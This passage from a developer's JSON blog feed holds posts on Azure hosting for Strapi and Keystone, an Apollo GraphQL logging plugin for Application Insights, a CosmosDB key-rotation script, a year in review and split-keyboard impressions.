how to run and hold pace better and I’ll be interested to see that in a race situation.\nFor 2022 I’m stretching myself with a goal of 1500km. Let’s see what injuries have to say about that!\n", "id": "2022-01-12-1300km" }, { "title": "2021 a Year in Review", "url": "https://www.aaron-powell.com/posts/2022-01-11-2021-a-year-in-review/", "date": "Tue, 11 Jan 2022 00:03:54 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "It’s that time of year again, time for reflection on past year and compare that to what I hoped to achieve in the previous post. Seemingly, this is the latest I’ve gotten to writing the post in a while, but it’s still the first half of January, so it’s not too late…\nBlogging Blogging has always been a mainstay of my online life, and something that’s been important to me, but last year was hard. Looking at the raw numbers, I did 29 posts, which is a little over half of what I did in 2020. There’s a few things that contributed to this, but one of the main things is that I spent more time trying to tackle some larger ideas that will pay off in longer blog series, rather than a lot of short and sharp posts which I’ve done a lot of in the past.\nI continued on my GraphQL on Azure series, and I’ve got a few more things that I want to blog about on that topic, it’s just a matter of finding the time to dig into them properly.\nAnother thing I did a bit of last year was getting back into the CMS space, in which I started working with both Strapi and Keystone and ensure they would have good docs on how to deploy to Azure. I’m working with the Strapi team at the moment to get improved docs and I created a Keystone sample app that links from their docs. Again, these are parts of larger projects I’m tackling, so they take some time to get the initial work up and running.\nLeadership The joke at Microsoft is that the most certain part of your career is a reorg, and we had one of those in the middle of 2021, our manager left to take the manager role of another part of Advocacy, which saw us without a manager. I’d been working closely with them on our FY22 strategy, so while the HR process of hiring a new manager was undertaken, I stepped into the manager role myself.\nThis is the first time I’d been a manager at Microsoft, even if it was only for the interim, and I found myself very much in the deep end. All of a sudden I had reports all over the globe, from Israel to France, Brazil to the US (and try and find a time when you can all be in a meeting at once, go on, I’ll wait…), so my job really shifted. Rather than focusing on the projects I was tackling, I started picking up those our former manager had been doing. I was scheduling 1:1’s with everyone on the team, getting properly across the projects they were all doing (we also had two new people join our team, so I had to get up to speed with their projects which were mostly net-new to me), undertake reporting, work out what partner teams across the business we can support, undertake performance reviews and start planning for 2022.\nIt was a great learning experience for me, and it was probably the best way for me to get a taste of management, leading a team I already knew and in a tech space I’m familiar with, but we’ve got a permanent lead joining shortly and I’m looking forward to stepping back into my pervious role and supporting the new lead.\nPresenting While 2020 was the year everyone tried to become an online presenter and Twitch streamer, I feel like 2021 was the year everyone tried to avoid doing that, myself included.\nDon’t get me wrong, I still did a few online presentations, I talked F# and web dev, joined a panel to talk about Serverless and discussed a web devs toolbox, plus some others for user groups around the country, but I was much more selective about it as I find presenting virtually a lot more draining an experience.\nI also stopped streaming. I talked about this in the 2020 reflection post, so many people went into dev streaming in 2020 but I don’t think any of us really thought through the value of it. Dev streaming is hard work, you need to be talking to the audience, regardless of how big or small they are, constantly so that they know what’s going on and can follow your thought processes. And then there’s the challenge of context. If you’re doing a live stream, can someone just pop in part way through and understand what’s going on, without having to review the previous however many hours you’ve been on air for? what if it’s a series stream, can someone tune into part 3 without the others being watched first?\nDon’t get me wrong, it’s possible to be a dev streamer and be successful with it, Glaucia on my team does it well, just a lot of us didn’t.\nBuilding a house At the end of the 2021 post I mentioned that my wife and I were building a new house. Well, it’s 2022 and… we’re still building a house 😒.\nBetween stuff ups with our builder (when they say they’ve submitted something to the council for approval, it doesn’t mean they have…), to delays getting demolition completed and signed off, to COVID shutting down construction in Sydney, we’re somewhat behind schedule.\nIt shouldn’t be that much longer, but as anyone who has built a house will tell you, delays are to be expected, so I’ll just say that I hope that when I write this post next year, it’s from the new house and not the rental we’re currently in! 😅\nLooking to 2022 Like last year, I’m going to avoid making any major predictions for what I’ll be doing in 2022 as COVID is meaning we’re really looking at things day to day, and long term planning becomes a somewhat abstract concept.\nI hope to get through some of the larger projects on my backlog as I’m really excited at how a bunch of this stuff can come together to solve problems people are having.\nAnd I hope that the year is just a little bit easier to manage.\n", "id": "2022-01-11-2021-a-year-in-review" }, { "title": "GraphQL on Azure: Part 8 - Logging", "url": "https://www.aaron-powell.com/posts/2021-12-07-graphql-on-azure-part-8-logging/", "date": "Tue, 07 Dec 2021 04:34:53 +0000", "tags": [ "azure", "javascript", "graphql" ], "description": "Logging and monitoring are important to understand how an app is performing, so let's integrate that into Apollo", "content": "As we’ve been looking at how to run GraphQL on Azure we’ve covered several topics of importance with Azure integration, but what we haven’t looked at is how we make sure that we are getting insights into our application so that if something goes wrong, we know about it. So for this post we’re going to address that as we take a look at logging using the Azure Application Insights platform (often referred to as AppInsights).\nIf you’re deploying into Azure in the ways that we’ve looked at in this series, chances are you’re already using AppInsights, as it’s the cornerstone of Azure’s monitoring platform, so let’s look at how to get better insights out of our GraphQL server.\nSide note: There’s a lot more you can do with AppInsights in monitoring your infrastructure, monitoring across resources, etc., but that’ll be beyond the scope of this article.\nTracing Requests Apollo has a plugin system that allows us to tap into the life cycle of the server and requests it receives/responds to, so that we can inspect them and operate against them.\nLet’s have a look at how we have create some tracing through the request life cycle with a custom plugin.\nWe’ll need the applicationinsights npm package, since this is a Node.js app and not client side (there’s different packages depending if you’re doing server or client side JavaScript).\nI’m also going to use the uuid package to generate a GUID for each request, allowing us to trace the events within a single request.\nLet’s get started coding:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import { ApolloServerPlugin, GraphQLSchemaContext, GraphQLServerListener } from "apollo-server-plugin-base"; import { TelemetryClient } from "applicationinsights"; import { v4 as uuid } from "uuid"; export default function( input: string | TelemetryClient, logName?: string ): ApolloServerPlugin { let client: TelemetryClient; if (typeof input === "string") { client = new TelemetryClient(input); } else { client = input; } return {}; } Here’s the starting point. I’m making this a generic plugin that you can either pass in the Instrumentation Key for AppInsights, or an existing TelemetryClient (the thing you create using the npm package), which allow you create a unique client or share it with the rest of your codebase. I’ve also added an optional logName argument, which we’ll put in each message for easy querying.\nTime to hook into our life cycle:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 export default function( input: string | TelemetryClient, logName?: string ): ApolloServerPlugin { let client: TelemetryClient; if (typeof input === "string") { client = new TelemetryClient(input); } else { client = input; } return { requestDidStart(context) { const requestId = uuid(); const headers: { [key: string]: string | null } = {}; if (context.request.http?.headers) { for (const [key, value] of context.request.http.headers) { headers[key] = value; } } client.trackEvent({ name: "requestDidStart", time: new Date(), properties: { requestId, metrics: context.metrics, request: context.request, headers, isDebug: context.debug, operationName: context.operationName, operation: context.operation, logName } }); } }; } The requestDidStart method will receive a GraphQLRequestContext which has a bunch of useful information about the request as Apollo has understood it, headers, the operation, etc., so we’re going to want to log some of that, but we’ll also enrich it a little ourselves with a requestId that will be common for allow events within this request and the logName, if provided.\nYou might be wondering why I’m doing headers in the way I am, that’s because context.request.http.headers is an Iterable and won’t get serialized properly, so we need to convert it into a standard object if we want to capture them.\nWe send this off to AppInsights using client.trackEvent:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 client.trackEvent({ name: "requestDidStart", time: new Date(), properties: { requestId, metrics: context.metrics, request: context.request, headers, isDebug: context.debug, operationName: context.operationName || context.request.operationName, operation: context.operation, logName } }); The name for the event will help us find the same event multiple times, so I’m using the life cycle method name, requestDidStart, and popping the current timestamp on there. Since I’m using trackEvent this will appear in the customEvents table within AppInsights, but you could use trackTrace or any of the other tables for storage, depending on how you want to query and correlate your logs across services.\nThis is an example of how that will appear in AppInsights, you can see the custom information we’ve pushed, such as the GraphQL operation and it’s name, the headers, etc.\nWe could then write a query against the table for all operations named TestQuery:\ncustomEvents | extend req = todynamic(tostring(customDimensions.["request"])) | where req.operationName == 'TestQuery' The plugin can then be expanded out to cover each of the life cycle methods, pushing the relevant information to AppInsights, and allowing you to understand the life cycle of your server anf requests.\nConclusion This is a really quick look at how we can integrate Azure Application Insights into the life cycle of Apollo Server and get some insights into the performance of our GraphQL server.\nI’ve created a GitHub repo with this plugin, and it’s available on npm.\nError loading GitHub repo\nThere’s another package in the repo, apollo-server-logger-appinsights, which provides a generic logger for Apollo, so that any logging Apollo (or third-party plugins) does will be pushed to AppInsights.\nHappy monitoring!\n", "id": "2021-12-07-graphql-on-azure-part-8-logging" }, { "title": "State of Serverless Panel at GraphQL Summit", "url": "https://www.aaron-powell.com/posts/2021-11-16-state-of-serverless-panel-at-graphql-summit/", "date": "Tue, 16 Nov 2021 05:37:19 +0000", "tags": [ "serverless", "speaking", "azure" ], "description": "Catch up on the panel session on the State of Serverless from GraphQL Summit 2021", "content": "Recently I was invited by the organisers of GraphQL Summit 2021 to be part of a panel about the State of Serverless.\nI joined the delightful Natalie Davis and Sunil Pai, and we had the awesome MC, Ivonne Roberts. It was a great bit of fun, we talked about some really interesting things and I even had Zoom crash on me during the session 🤣!\nYou can check out the recording on YouTube.\n", "id": "2021-11-16-state-of-serverless-panel-at-graphql-summit" }, { "title": "Scaffolding Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-11-16-scaffolding-static-web-apps/", "date": "Tue, 16 Nov 2021 03:41:40 +0000", "tags": [ "javascript", "azure" ], "description": "I make a lot of Azure Static Web Apps, so I make it easier to scaffold them.", "content": "\nModified version of this comic\nOver the past 18 months I’ve created a lot of Azure Static Web Apps, like… a lot. I’ve hit the quota of free apps several times and had to clean out demos to keep testing things!\nBut it’s always a little bit tedious, running create-react-app, setting up Functions, etc. so I went about creating a GitHub repo template for a basic React + TypeScript + Functions app. Then sometimes I’d be wanting a different framework, so I’d go off hunting for a new template, rinse and repeat.\nEnter create-swa-app To tackle this, I decided to create a command line tool to be used with npm init, @aaronpowell/swa-app, which will guide you through the creation using one of the templates that is listed on awesome-static-web-apps. It will also offer to create a GitHub repo for you using the template (this will prompt for a GitHub sign in workflow), so you’ll be ready to deploy it to Azure!\nThink of this as a helpful starting point before jumping into the SWA CLI or VS Code extension.\nHopefully you’ll find this as a useful way to scaffold up a Static Web Apps project!\n", "id": "2021-11-16-scaffolding-static-web-apps" }, { "title": "Keystone on Azure: Part 2 - Hosting", "url": "https://www.aaron-powell.com/posts/2021-11-02-keystone-on-azure-part-2-hosting/", "date": "Tue, 02 Nov 2021 01:28:25 +0000", "tags": [ "azure", "graphql", "javascript" ], "description": "We've got local dev with Keystone working, now we'll look at what we need for hosting", "content": "In today’s article, we’re going to look at what resources in Azure we’re going to need to host Keystone.\nAt its core Keystone is an Express.js application so we’re going to need some way to host this. Alas, that means that my standard hosting model in Azure, Azure Functions, is off the table. It’s not setup for hosting a full web server like we have with Express.js, so we need something else.\nDatabases For data storage, Keystone uses Prisma to do data access normalisation, no need for separate providers for the different SQL databases or MongoDB, etc. but they are restricting support of the database to SQLite and PostgreSQL for the time being.\nSQLite shouldn’t be used for production, so instead, we’ll use Azure Database for PostgreSQL, which gives us a managed PostgreSQL instance (or cluster, depending on the scale needs). No need to worry about backup management, patching, etc. just leverage the hosted service in Azure and simplify it all.\nAzure AppService The service in Azure that we’re going to want is AppService (it’s also called WebApps in some places, but for simplicities sake, I’ll use the official service name). AppService gives you a Platform as a Service (PaaS) hosting model, meaning we’re not going to need to worry about underlying hosting infrastructure (OS management, disk management, etc.), we just select the scale that we need and Azure takes care of it.\nMy preference for Node.js apps is to host on a Linux AppService, rather than a Windows host, and that’s mainly because my experience has suggested that it’s a better fit, but at the end of the day, the OS doesn’t make any difference, as in a PaaS model, you don’t have to care about the host.\nSide note - when you’re running on a Linux AppService, it’s actually running within a Container, not directly on the host. This is different to AppService Containers which is for BYO Containers. Either way, for doing diagnostics, you may be directed to Docker output logging.\nStoring images and files Since we’re using PaaS hosting, we need some way to store images and files that the content editor uploads in a way that doesn’t use the local disk. After all, the local disk isn’t persistent in PaaS, as you scale, redeploy, or Azure needs to reallocate resources, the local disk of your host is lost.\nThis is where Azure Storage is needed. Files are pushed into it as blobs and then accessed on demand. There is several security modes in which you can store blobs, but the one that’s most appropriate for a tool like Keystone is to use Anonymous Blob Access, which means that anyone can access the Blob in a read-only manner, but they are unable to enumerate over the container and find other blobs that are in there.\nTo work with Azure Storage in Keystone, you need to use a custom field that I’ve created for the k6-contrib project @k6-contrib/fields-azure. The fields can be used either with the Azurite emulator or an Azure Storage account, allowing for disconnected local development if you’d prefer.\nConclusion Today we’ve started exploring the resources that we’ll need when it comes time to deploy Keystone to Azure. While it’s true you can use different resources, Virtual Machines, Container orchestration, etc., I find that using a PaaS model with AppService, and a managed PostgreSQL the best option as it simplifies the infrastructure management that is needing to be undertaken by the team, and instead they can focus on the application at hand.\n", "id": "2021-11-02-keystone-on-azure-part-2-hosting" }, { "title": "Keystone on Azure: Part 1 - Local Dev", "url": "https://www.aaron-powell.com/posts/2021-11-02-keystone-on-azure-part-1-local-dev/", "date": "Tue, 02 Nov 2021 00:19:08 +0000", "tags": [ "azure", "graphql", "javascript" ], "description": "It's time to start a new series on using Keystone on Azure. Let's look at how we setup a local dev environment.", "content": "As I’ve been exploring GraphQL on Azure through my series of the same name I wanted to take a look at how we can run applications that provide GraphQL as an endpoint easily, specifically those which we’d class as headless CMSs (Content Management Systems).\nSo let’s start a new series in which we look at one such headless CMS, Keystone 6. Keystone is an open source project created by the folks over at Thinkmill and gives you a code-first approach to creating content types (models for the data you store), a web UI to edit the content and a GraphQL API in which you can consume the data via.\nNote: At the time of writing, Keystone 6 is still in pre-release, so some content might change when GA hits.\nIn this series we’re going to create an app using Keystone, look at the services on Azure that we’d need to host it and how to deploy it using GitHub Actions. But first up, let’s look at the local development experience and how we can optimise it for the way that (I think) gives you the best bang for buck.\nSetting up Keystone The easiest way to setup Keystone is to use the create-keystone-app generator, which you can read about in their docs. I’m going to use npm as the package manager, but you’re welcome to use yarn if that’s your preference.\n1 npm init keystone-app@latest azure-keystone-demo This will create the app in the azure-keystone-demo folder, but feel free to change the folder name to whatever you want.\nConfiguring VS Code I use VS Code for all my development, so I’m going to show you how to set it up for optimal use in VS Code.\nOnce we’ve opened VS Code the first thing we’ll do is add support for Remote Container development. I’ve previously blogged about why you need remote containers in projects and I do all of my development in them these days as I love having a fully isolated dev environment that only has the tooling I need at that point in time.\nYou’ll need to have the Remote - Containers extension extension installed.\nOpen the VS Code Command Pallette (F1/CTRL+SHIFT+P) and type Remote-Containers: Add Development Container Configuration Files and select the TypeScript and Node.js definition.\nBefore we reopen VS Code with the remote container we’re going to do some tweaks to it. Open the .devcontainer/devcontainer.json file and let’s add a few more extensions:\n1 2 3 4 5 6 7 8 9 "extensions": [ "dbaeumer.vscode-eslint", "esbenp.prettier-vscode", "apollographql.vscode-apollo", "prisma.prisma", "github.vscode-pull-request-github", "eg2.vscode-npm-script", "alexcvzz.vscode-sqlite" ], This will configure VS Code with eslint, prettier, Apollo’s GraphQL plugin (for GraphQL language support), Prisma’s plugin (for Prisma language support), GitHub integration, npm and a sqlite explorer.\nSince we’re using SQLite for local dev I find it useful to install the SQLite plugin for VS Code but that does mean that we need the sqlite3 package installed into our container, so let’s add that by opening the Dockerfile and adding the following line:\n1 2 RUN apt-get update && export DEBIAN_FRONTEND=noninteractive \\ && apt-get -y install --no-install-recommends sqlite3 Lastly, I like to add a postCreateCommand to my devcontainer.json file that does npm install, so all my dependencies are installed when the container starts up (if you’re using yarn, then make the command yarn install instead).\nAnother useful thing you can do is setup some VS Code Tasks so that you can run the different commands (like dev, start, build) rather than using the terminal, but that’s somewhat personal preference so I’ll leave it as an exercise for the reader.\nAnd with that done, you’re dev environment is ready to go, use the command pallette to reopen VS Code in a container and you’re all set.\nConclusion I know that this series is called “Keystone on Azure” and we didn’t do anything with Azure, but I thought it was important to get ourselves setup and ready to go so that when we are ready to work with Azure, it’s as easy as can be.\n", "id": "2021-11-02-keystone-on-azure-part-1-local-dev" }, { "title": "Host Strapi 3 on Azure", "url": "https://www.aaron-powell.com/posts/2021-10-14-host-strapi-3-on-azure/", "date": "Thu, 14 Oct 2021 23:15:02 +0000", "tags": [ "javascript", "azure", "graphql" ], "description": "Curious on how to run Strapi 3 on Azure without learning about VM's, check this out then!", "content": "I originally contributed the following as a guide for the official Strapi docs, but as they are working on v4 of Strapi at the moment, I figured it would still be good to include somewhere, so here it is on my blog! As a result, the layout of the content won’t be my normal blog style, it’s more documtation-esq, but it should still do the job.\nIf you’re new to Strapi, Strapi is a headless CMS that you would host somewhere and use their API to pull the content into an application, be it a SPA in your favourite JavaScript framework, a mobile app, or something else.\nThese guides are tested against the v3 release of Strapi, as v4 is in beta at the time of writing. It’s likely that much of the content covered here will be applicable for v4, the only thing I expect to change is how to use the file upload provider, I’m unsure if the existing plugin will work with v4.\nAzure Install Requirements You must have an Azure account before doing these steps. Table of Contents Create resources using the portal Create using the Azure CLI Create Azure Resource Manager template Storing files and images with Azure Storage Required Resources There are three resources in Azure that are required to run Strapi in a PaaS model, AppService to host the Strapi web application, Storage to store images/uploaded assets, and a database, Azure has managed MySQL and Postgres to choose from (for this tutorial, we’ll use MySQL, but the steps are the same for MySQL).\nCreating Resources via the Azure Portal In this section we’ll use the Azure Portal to create the required resources to host Strapi.\nNavigate to the Azure Portal\nClick Create a resource and search for Resource group from the provided search box\nProvide a name for your Resource Group, my-strapi-app, and select a region\nClick Review + create then Create\nNavigate to the Resource Group once it’s created, click Create resources and search for Web App\nEnsure the Subscription and Resource Group are correct, then provide the following configuration for the app:\nName - my-strapi-app Publish - Code Runtime stack - Node 14 LTS Operating System - Linux Region - Select an appropriate region Use the App Service Plan to select the appropriate Sku and size for the level of scale your app will need (refer to the Azure docs for more information on the various Sku and sizes)\nClick Review + create then Create\nNavigate back to the Resource Group and click Create then search for Storage account and click Create\nEnsure the Subscription and Resource Group are correct, then provide the following configuration for the storage account:\nName - my-strapi-app Region - Select an appropriate region Performance - Standard Redundancy - Select the appropriate level of redundancy for your files Click Review + create then Create\nNavigate back to the Resource Group and click Create then search for Azure Database for MySQL and click Create\nSelect Single server for the service type\nEnsure the Subscription and Resource Group are correct, then provide the following configuration for the storage account:\nName - my-strapi-db Data source - None (unless you’re wanting to import from a backup) Location - Select an appropriate region Version - 5.7 Compute + storage - Select an appropriate scale for your requirements (Basic is adequate for many Strapi workloads) Enter a username and password for the Administrator account, click Review + create then Create\nConfiguring the Resources Once all the resources are created, you will need to get the connection information for the MySQL and Storage account to the Web App, as well as configure the resources for use.\nConfigure the Storage Account Navigate to the Storage Account resource, then Data storage - Containers Create a new Container, provide a Name, strapi-uploads, and set Public access level to Blob, then click Create Navigate to Security + networking - Access keys, copy the Storage account name and key1 Navigate to the Web App you created and go to Settings - Configuration Create new application settings for the Storage account, storage account key and container name (these will become the environment variables available to Strapi) and click Save Configure MySQL Navigate to the MySQL resource then Settings - Connection security\nSet Allow access to Azure services to Yes and click Save\nNavigate to Overview and copy Server name and Server admin login name\nOpen the Azure Cloud Shell and log into the mysql cli:\nmysql --host <server> --user <username> -p Create a database for Strapi to use CREATE DATABASE strapi; then close the Cloud Shell\nOptional - create a separate non server admin user (see this doc for guidance) Navigate to the Web App you created and go to Settings - Configuration\nCreate new application settings for the Database host, username and password (these will become the environment variables available to Strapi) and click Save\nCreating Resources via the Azure CLI In this section, we’ll use the Azure CLI to create the required resources. This will assume you have some familiarity with the Azure CLI and how to find the right values.\nCreate a new Resource Group\n1 2 3 rgName=my-strapi-app location=westus az group create --name $rgName --location $location Create a new Linux App Service Plan (ensure you change the number-of-workers and sku to meet your scale requirements)\n1 2 appPlanName=strapi-app-service-plan az appservice plan create --resource-group $rgName --name $appPlanName --is-linux --number-of-workers 4 --sku S1 --location $location Create a Web App running Node.js 14\n1 2 webAppName=my-strapi-app az webapp create --resource-group $rgName --name $webAppName --plan $appPlanName --runtime "node|10.14" Create a Storage Account\n1 2 3 4 5 6 7 8 9 saName=mystrapiapp az storage account create --resource-group $rgName --name $saName --location $location # Get the access key saKey=$(az storage account keys list --account-name $saName --query "[?keyName=='key1'].value" --output tsv) # Add a container to the storage account container=strapi-uploads az storage container create --name $container --public-access blob --access-key $saKey --account-name $saName Create a MySQL database\n1 2 3 4 5 6 7 8 9 10 11 12 13 serverName=my-strapi-db dbName=strapi username=strapi password=... # Create the server az mysql server create --resource-group $rgName --name $serverName --location $location --admin-user $username --admin-password $password --version 5.7 --sku-name B_Gen5_1 # Create the database az mysql db create --resource-group $rgName --name $dbName --server-name $serverName # Allow Azure resources through the firewall az mysql server firewall-rule create --resource-group $rgName --server-name $serverName --name AllowAllAzureIps --start-ip-address 0.0.0.0 --end-ip-address 0.0.0.0 Add configuration values to the Web App\n1 2 3 4 5 6 az webapp config appsettings set --resource-group $rgName --name $webAppName --setting STORAGE_ACCOUNT=$saName az webapp config appsettings set --resource-group $rgName --name $webAppName --setting STORAGE_ACCOUNT_KEY=$saKey az webapp config appsettings set --resource-group $rgName --name $webAppName --setting STORAGE_ACCOUNT_CONTAINER=$container az webapp config appsettings set --resource-group $rgName --name $webAppName --setting DATABASE_HOST=$serverName.mysql.database.azure.com az webapp config appsettings set --resource-group $rgName --name $webAppName --setting DATABASE_USERNAME=$username@$serverName az webapp config appsettings set --resource-group $rgName --name $webAppName --setting DATABASE_PASSWORD=$password Deploy with an Azure Resource Manager template To deploy using an Azure Resource Manager template, use the button below, or upload this template as a custom deployment in Azure.\nStoring files and images As AppService is a PaaS hosting model, an upload provider will be required to save the uploaded assets to Azure Storage. Check out https://github.com/jakeFeldman/strapi-provider-upload-azure-storage for more details on using Azure Storage as an upload provider.\nLocal development For local development, you can either use the standard Strapi file/image upload provider (which stored on the local disk), or the Azurite emulator.\nDeploying and running Strapi Azure AppService can be deployed to using CI/CD pipelines or via FTPS, refer to the Azure docs on how to do this for your preferred manner.\nTo start the Node.js application, AppService will run the npm start command. As there is no guarantee that the symlinks created by npm install were preserved (in the case of an upload from a CI/CD pipeline) it is recommended that the npm start command directly references the Keystone entry point:\n1 2 3 "scripts": { "start": "node node_modules/strapi/bin/strapi.js start" } Conclusion This has been a look at how we can use the different PaaS features of Azure to host Strapi, and the different ways in which you can setup those resources. I prefer to use the Resource Manager template myself, and then configure GitHub Actions as the CI/CD pipeline so that deployments all happen smoothly in the future.\nHopefully this makes it easier for you to also get your Strapi sites running in Azure, and once Strapi 4 is out, I’ll get some updated content on the differences that you need to be aware of when hosting in Azure.\n", "id": "2021-10-14-host-strapi-3-on-azure" }, { "title": "ZSA Moonlander - One Month On", "url": "https://www.aaron-powell.com/posts/2021-09-01-zsa-moonlander-one-month-on/", "date": "Wed, 01 Sep 2021 06:20:44 +0000", "tags": [ "keyboard" ], "description": "It's been a month since I got my Moonlander, so how's it all going?", "content": "A month ago I got myself a ZSA Moonlander keyboard as a replacement for my aging Microsoft Natural 4000, and I wrote about my first few days with it.\nNow that a month as past, I thought it might be a good idea to give an update on how I’ve been finding it, and what I’ve learnt, for anyone else who might be considering a similar keyboard journey.\nCorrection from last post First up, I need to make a correction from my pervious post. In it I said that the keyboard is an ortholinear layout, which was incorrect. The Moonlander is a Columnar layout, which is similar to ortholinear but with a slight difference. In an otherolinear layout the keys are in a strict grid, with no offset between the keys, as you can see in ZSA’s Planck EZ:\nColomnar is similar in that the keys are aligned in a series of vertical columns, each key is inline with the one directly above it, but the columns are vertically offset from each other to match the finger length of the finger that is meant to use that column. So the column for the middle finger goes up higher than any others, as it’s the longest finger and can stretch further up. without going down as far as say, a pinky.\nLearning a new keyboard layout With that correction sorted, what’s it like? I’ve been using staggered all my life, it’s what all stock keyboards are, it’s how virtually every third-party keyboard is created, so using something different is… interesting.\nAfter about a week I found myself pretty much back up to speed on what would be a usual typing session, one that consisted of words not code, but I wasn’t really making any use of the columnar layout.\nThis results in a lot of lazy habits on the keyboard and not really getting the maximum value, reduced joint stress through simplified movement. For the last week I’ve started to undo that by doing daily typing lessons over at keybr.com.\nIf you want to try and feel dumb about typing, I’d highly recommend trying something like that out. I’m finding that I’m averaging low 20’s in my words-per-minute, sometimes peaking at 30, but that’s somewhat rare (and generally error prone).\nSo, has it been worth it so far? I think so. While I do feel like a fool a lot of the time when I’m typing, what I have noticed is that when I get into a typing rhythm and start really using the layout to it’s advantages (up/down finger movements rather than side to side) it feels really nice. Like, really nice. I’m not sure how to really describe it, but not having anything more than my fingers making some very minor movements makes the typing seem to flow a lot smoother.\nWhat I have noticed though is that my left hand has picked this up a lot faster than my right hand. This may be because I’m left handed (but really only for writing, everything else I’ve trained myself to do right handed), but I’m really struggling to get my right hand to move beyond using only one or two fingers without a lot of thinking about it. Maybe after a few more weeks of typing practice that’ll change.\nRelearning typing with reading difficulties Somewhat of a side point, but very much related to learning to type is something I never considered, the impact my reading difficulties would have.\nI’m someone who struggles to read, this is partially why I tend not to write notes when presenting, I can’t read them on the fly. It’s possible that I’ve got some form of dyslexia, but as I’ve never been diagnosed I don’t like to apply a label. What I know is that when I see letters and words, it’s often not in the order they are meant to be.\nThis makes for a challenge when it comes to relearning to type. Whether I’m using keybr or the typing training from ZSA, it’s a challenge because I need to read what’s on screen, process it correctly and then type it out exactly. But since I’ll often read it incorrectly, what I type might be what I read but wasn’t what was originally on screen. Because of this, I find writing, such as doing this blog, just as valuable, if not more, because I’m not trying to retype someone elses words, I’m bringing my own.\nSo if you’re looking to relearn how to type, take into consideration how you go about processing words to be able to type them back out.\nI have found keybr.com both a positive and a negative as it doesn’t really use words, more collections of letters to learn patterns. As they aren’t words I don’t do as much “fill in the blanks” as I do on other typing practice, but also as they aren’t words I have trouble focusing on what I’m aiming to type. I’d suggest trying a few services to find what’s right for you.\nLayers One thing about this keyboard, like many smaller keyboards, is that they use layers to give you access to the keys you’re dropping.\nThis has taken a lot of work to get use to, and I find that it’s a large cognitive effort to use them effectively. I think this is also resulting in an increased usage of the mouse. I was someone who was very keyboard orientated for navigation around tools, but I’ve been using the mouse a bit more as I’ve trying to retrain the finger dance to get shortcuts to work.\nIf you look at the keyboard layout I’m using most of the symbol keys are across two layers, with layer 1 being common coding symbols and layer 2 being punctuation. In the first few days, I found myself moving keys around a fair bit, but after about a week I settled down and the only changes were to make some symbols more accessible to my left hand.\nAs a result, when doing coding, I do find that I have to think more about the dance my hands need to take before I take it. I don’t doubt that this will improve over time with practice, I already find some symbols easier to get without looking (such as the ones for markdown!) but for now coding is still a bit of a chore.\nKey switches As this is a mechanical keyboard, I’ve delved into the wonderful world of “OMG why is this so complicated!” when it comes to how you want the keys to feel and sound. When I got the keyboard I had Kailh Gold switches in, which are super clacky to type on. After a few weeks (and the odd sideways death look from my wife 😝) I decided to move the letter keys over to the Cherry MX Brown switches. These are much quieter to type on, have more of a thunk than a high pitched clack when you type, and that’s probably better in an office/shared workspace.\nBut do I notice any difference? Sort of. I’ll admit that the Gold’s do feel a lot nicer to type on, they are super responsive and feel very fast as I type. That’s not to say that the Brown’s feel sluggish or anything, they are more than adequate to type on, they just don’t feel quite as nice.\nOnce we are no longer having to home school, COVID restrictions lift so my wife can work again and our new house is built (in which I’ve installed sound proofing in the office) I’ll probably switch back to the Gold’s for all keys. For the time being though, I have the clack only when I’m using a non-letter key (which does help a bit in learning which key is where, as I have audible feedback).\nKeyboard position When I first started with the keyboard, here’s how I had it on the desk:\nFour weeks later and here’s the position:\nThe position of the keyboard is much wider now, it’s about the full width of my shoulders, and it feels pretty comfortable at that width. This has also resulted it me using my chair arm rests less than I use to, which I didn’t expect. I’ve also lowered the height of my desk, even when I’m in standing position, as I haven’t found a need to bring my hands up as high.\nThere is a downside of this layout is that I can’t quite work out where to put my mouse. Previously, the mouse was sitting at about shoulder alignment of my right arm (I use the mouse right handed, even though I identify as as lefty), but now I have half a keyboard there, so the mouse ends up sitting either between the two halves, or way off to the right. I’m still not sure how to do this better (and I can’t get use to the keyboard-driven mouse control…), so we’ll see what happens to the mouse long-term.\nConclusion One month in, typing is not back to where it once was, but I’m still happy with the keyboard.\nI’m enjoying the wider set of my hands and I’m feeling better through my back and shoulders as a result. I also feel like I have a better posture while typing (I still slouch massively when I’m not typing 🤫), which I wasn’t really expecting.\nMy plan is to keep going with typing lessons for a while to try and get better at using the Columnar layout and reduce the overall hand movement while typing, instead just using finger movements. I’ve already noticed how much better that feels on my left hand, so my hope is that I can get my right hand to follow suite.\nI get that this isn’t for everyone, but if you are someone who has wrist or shoulder pain, consider the role that your keyboard may be playing in that and look into something like the Moonlander as an option.\n", "id": "2021-09-01-zsa-moonlander-one-month-on" }, { "title": "Regenerate All CosmosDB Keys", "url": "https://www.aaron-powell.com/posts/2021-08-31-regenerate-all-cosmosdb-keys/", "date": "Tue, 31 Aug 2021 00:56:52 +0000", "tags": [ "azure" ], "description": "Here's how to regen all your keys for CosmosDB", "content": "A few days ago a vulnerability in CosmosDB was announced that allows attackers to access the access keys and thus get into a database.\nWhile Microsoft has disabled the feature that was allowing for the vulnerability, it is strongly recommended that everyone regenerate their access keys. But if you’ve got multiple databases, this can be a slow process.\nSo, here’s handy script that will do it for you, using the Azure CLI:\n1 2 3 4 5 info=$(az cosmosdb list --query "[].{​​​​​​​ name: name, resourceGroup: resourceGroup }​​​​​​​" -o tsv) echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind primary --name $0 -g $1' echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind primaryReadonly --name $0 -g $1' echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind secondary --name $0 -g $1' echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind secondaryReadonly --name $0 -g $1' You’ll still need to get the keys and update your apps to use the new keys, but this will at least get them all cycled for you!\n", "id": "2021-08-31-regenerate-all-cosmosdb-keys" }, { "title": "Keyboard First Impressions - ZSA Moonlander", "url": "https://www.aaron-powell.com/posts/2021-07-29-keyboard-first-impressions-zsa-moonlander/", "date": "Thu, 29 Jul 2021 00:36:45 +0000", "tags": [ "keyboard" ], "description": "I decided to upgrade my keyboard to a split layout, here's my first impressions", "content": "Keyboards, as software developers it’s something we use daily, and for extended periods of time. But it’s not something that 